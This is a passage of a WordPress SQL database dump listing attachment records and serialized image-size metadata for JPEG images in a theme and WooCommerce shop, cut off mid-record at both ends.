:{s:4:\"file\";s:29:\"kitchen-right-img-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:29:\"kitchen-right-img-600x771.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:771;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:29:\"kitchen-right-img-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51443,4279,'_wp_attachment_image_alt','m'),(51444,4282,'_wp_attached_file','2018/07/shop-img-19.jpg'),(51445,4282,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:673;s:4:\"file\";s:23:\"2018/07/shop-img-19.jpg\";s:5:\"sizes\";a:12:{s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"shop-img-19-300x252.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:252;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"shop-img-19-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"shop-img-19-768x646.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:646;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:23:\"shop-img-19-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:23:\"shop-img-19-800x650.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:23:\"shop-img-19-650x673.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:673;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:23:\"shop-img-19-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:23:\"shop-img-19-600x505.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:505;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:23:\"shop-img-19-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:23:\"shop-img-19-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:23:\"shop-img-19-600x505.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:505;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:23:\"shop-img-19-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51446,4283,'_wp_attached_file','2018/07/h1-single-img-3.jpg'),(51447,4283,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:530;s:4:\"file\";s:27:\"2018/07/h1-single-img-3.jpg\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"h1-single-img-3-300x199.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:199;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"h1-single-img-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"h1-single-img-3-768x509.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:509;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:27:\"h1-single-img-3-650x530.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:530;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:27:\"h1-single-img-3-650x530.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:530;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:27:\"h1-single-img-3-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:27:\"h1-single-img-3-600x398.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:27:\"h1-single-img-3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:27:\"h1-single-img-3-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:27:\"h1-single-img-3-600x398.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:27:\"h1-single-img-3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51448,4284,'_wp_attached_file','2018/08/h8-img-4.jpg'),(51449,4284,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:875;s:6:\"height\";i:945;s:4:\"file\";s:20:\"2018/08/h8-img-4.jpg\";s:5:\"sizes\";a:12:{s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"h8-img-4-278x300.jpg\";s:5:\"width\";i:278;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"h8-img-4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"h8-img-4-768x829.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:829;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:20:\"h8-img-4-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:20:\"h8-img-4-875x650.jpg\";s:5:\"width\";i:875;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:20:\"h8-img-4-650x945.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:945;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:20:\"h8-img-4-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:20:\"h8-img-4-600x648.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:648;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"h8-img-4-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:20:\"h8-img-4-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:20:\"h8-img-4-600x648.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:648;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"h8-img-4-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51450,4285,'_wp_attached_file','2018/07/shop-img-8.jpg'),(51451,4285,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:673;s:4:\"file\";s:22:\"2018/07/shop-img-8.jpg\";s:5:\"sizes\";a:12:{s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"shop-img-8-300x252.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:252;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"shop-img-8-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"shop-img-8-768x646.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:646;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:22:\"shop-img-8-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:22:\"shop-img-8-800x650.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:22:\"shop-img-8-650x673.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:673;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:22:\"shop-img-8-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:22:\"shop-img-8-600x505.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:505;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:22:\"shop-img-8-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:22:\"shop-img-8-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:22:\"shop-img-8-600x505.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:505;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:22:\"shop-img-8-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51452,4286,'_wp_attached_file','2018/08/shop-img-24.jpg'),(51453,4286,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:673;s:4:\"file\";s:23:\"2018/08/shop-img-24.jpg\";s:5:\"sizes\";a:12:{s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"shop-img-24-300x252.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:252;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"shop-img-24-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"shop-img-24-768x646.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:646;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:23:\"shop-img-24-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:23:\"shop-img-24-800x650.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:23:\"shop-img-24-650x673.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:673;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:23:\"shop-img-24-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:23:\"shop-img-24-600x505.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:505;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:23:\"shop-img-24-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:23:\"shop-img-24-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:23:\"shop-img-24-600x505.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:505;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:23:\"shop-img-24-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51454,4281,'_wp_attachment_image_alt','e'),(51455,4283,'_wp_attachment_image_alt','c'),(51456,4282,'_wp_attachment_image_alt','a'),(51457,4285,'_wp_attachment_image_alt','x'),(51458,4284,'_wp_attachment_image_alt','m'),(51459,4286,'_wp_attachment_image_alt','x'),(51460,171,'_wp_attached_file','2018/07/h1-single-img-4.jpg'),(51461,171,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:840;s:4:\"file\";s:27:\"2018/07/h1-single-img-4.jpg\";s:5:\"sizes\";a:12:{s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"h1-single-img-4-286x300.jpg\";s:5:\"width\";i:286;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"h1-single-img-4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"h1-single-img-4-768x806.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:806;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:27:\"h1-single-img-4-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:27:\"h1-single-img-4-800x650.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:27:\"h1-single-img-4-650x840.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:840;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:27:\"h1-single-img-4-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:27:\"h1-single-img-4-600x630.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:630;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:27:\"h1-single-img-4-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:27:\"h1-single-img-4-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:27:\"h1-single-img-4-600x630.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:630;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:27:\"h1-single-img-4-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51462,4287,'_wp_attached_file','2018/07/shop-img-20.jpg'),(51463,4287,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:673;s:4:\"file\";s:23:\"2018/07/shop-img-20.jpg\";s:5:\"sizes\";a:12:{s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"shop-img-20-300x252.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:252;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"shop-img-20-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"shop-img-20-768x646.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:646;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:23:\"shop-img-20-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:23:\"shop-img-20-800x650.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:23:\"shop-img-20-650x673.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:673;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:23:\"shop-img-20-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:23:\"shop-img-20-600x505.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:505;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:23:\"shop-img-20-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:23:\"shop-img-20-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:23:\"shop-img-20-600x505.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:505;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:23:\"shop-img-20-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51464,46,'_wp_attached_file','2018/07/shop-img-9.jpg'),(51465,46,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:673;s:4:\"file\";s:22:\"2018/07/shop-img-9.jpg\";s:5:\"sizes\";a:12:{s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"shop-img-9-300x252.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:252;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"shop-img-9-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"shop-img-9-768x646.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:646;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:22:\"shop-img-9-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:22:\"shop-img-9-800x650.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:22:\"shop-img-9-650x673.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:673;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:22:\"shop-img-9-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:22:\"shop-img-9-600x505.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:505;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:22:\"shop-img-9-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:22:\"shop-img-9-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:22:\"shop-img-9-600x505.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:505;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:22:\"shop-img-9-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51466,4288,'_wp_attached_file','2018/08/h8-img-5.jpg'),(51467,4289,'_wp_attached_file','2018/08/h1-img-2.jpg'),(51468,4290,'_wp_attached_file','2018/08/shop-img-25.jpg'),(51469,4289,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:800;s:4:\"file\";s:20:\"2018/08/h1-img-2.jpg\";s:5:\"sizes\";a:12:{s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"h1-img-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"h1-img-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"h1-img-2-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:20:\"h1-img-2-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:20:\"h1-img-2-800x650.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:20:\"h1-img-2-650x800.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:800;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:20:\"h1-img-2-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:20:\"h1-img-2-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i